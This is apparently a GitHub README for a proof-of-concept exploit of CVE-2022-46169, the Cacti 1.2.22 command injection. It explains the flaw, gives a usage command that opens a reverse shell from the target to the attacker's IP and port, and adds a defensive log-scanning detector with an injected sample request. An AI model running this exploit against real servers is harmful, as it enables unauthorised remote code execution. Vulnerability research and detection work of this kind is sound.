PoC for CVE-2022-46169 that affects Cacti 1.2.22 version

devilgothies/CVE-2022-46169

CVE-2022-46169 POC

This is a Proof of Concept (POC) script for the CVE-2022-46169 vulnerability that affects Cacti version 1.2.22.

Description

CVE-2022-46169 is an unauthenticated command injection in Cacti versions through 1.2.22 that leads to remote code execution as the www-data user. The vulnerability is caused by improper validation of user input in the "host_id" parameter of the "remote_agent.php" file.
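For defenders, a log check for the condition described above, added here as an example that is not part of this repository's script: it scans web-server access-log lines for requests to remote_agent.php whose host_id is not a plain integer or whose parameters contain shell metacharacters. The combined log format, the /cacti/ path and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request portion of a common/combined access-log line (format is an assumption).
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Characters with special meaning to a shell; none belong in a numeric ID.
SHELL_META = re.compile(r"[;|&`$(){}<>\r\n]")

# Constructed sample lines (documentation address ranges, hypothetical /cacti/ path).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jan/2023:10:00:01 +0000] "GET /cacti/remote_agent.php?host_id=3 HTTP/1.1" 200 54 "-" "-"',
    '203.0.113.7 - - [10/Jan/2023:10:00:09 +0000] "GET /cacti/remote_agent.php?host_id=1%3Becho+constructed HTTP/1.1" 200 54 "-" "-"',
    '198.51.100.4 - - [10/Jan/2023:10:00:12 +0000] "GET /cacti/index.php HTTP/1.1" 200 1024 "-" "-"',
]


def suspicious_requests(lines):
    """Return (client, status, reasons) for remote_agent.php requests whose
    host_id is not a plain integer or whose parameters hold shell metacharacters."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        url = urlsplit(match["target"])
        if not unquote(url.path).endswith("/remote_agent.php"):
            continue
        reasons = set()
        # parse_qsl percent-decodes values, so encoded metacharacters are seen too.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == "host_id" and not re.fullmatch(r"[0-9]+", value):
                reasons.add("non-numeric host_id")
            if SHELL_META.search(value):
                reasons.add(f"shell metacharacter in {name}")
        if reasons:
            hits.append((match["client"], int(match["status"]), sorted(reasons)))
    return hits


if __name__ == "__main__":
    for client, status, reasons in suspicious_requests(SAMPLE_LOG):
        print(f"{client} status={status}: {', '.join(reasons)}")
```

Access logs normally record only the request line, so this check sees query-string parameters and not request bodies or headers.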

Usage

python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>

Replace <TARGET_URL> with the URL of the target Cacti installation, <YOUR_IP> with the IP address of the machine where you want to receive the reverse shell, and <YOUR_PORT> with the port number where you want to receive the reverse shell.

Example:

python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337

Disclaimer

This POC script is for educational purposes only. Use it at your own risk. The author of this script is not responsible for any damage caused by the use of this script.

References

CVE-2022-46169 - CVE entry for the vulnerability.
Cacti Security Advisories on GitHub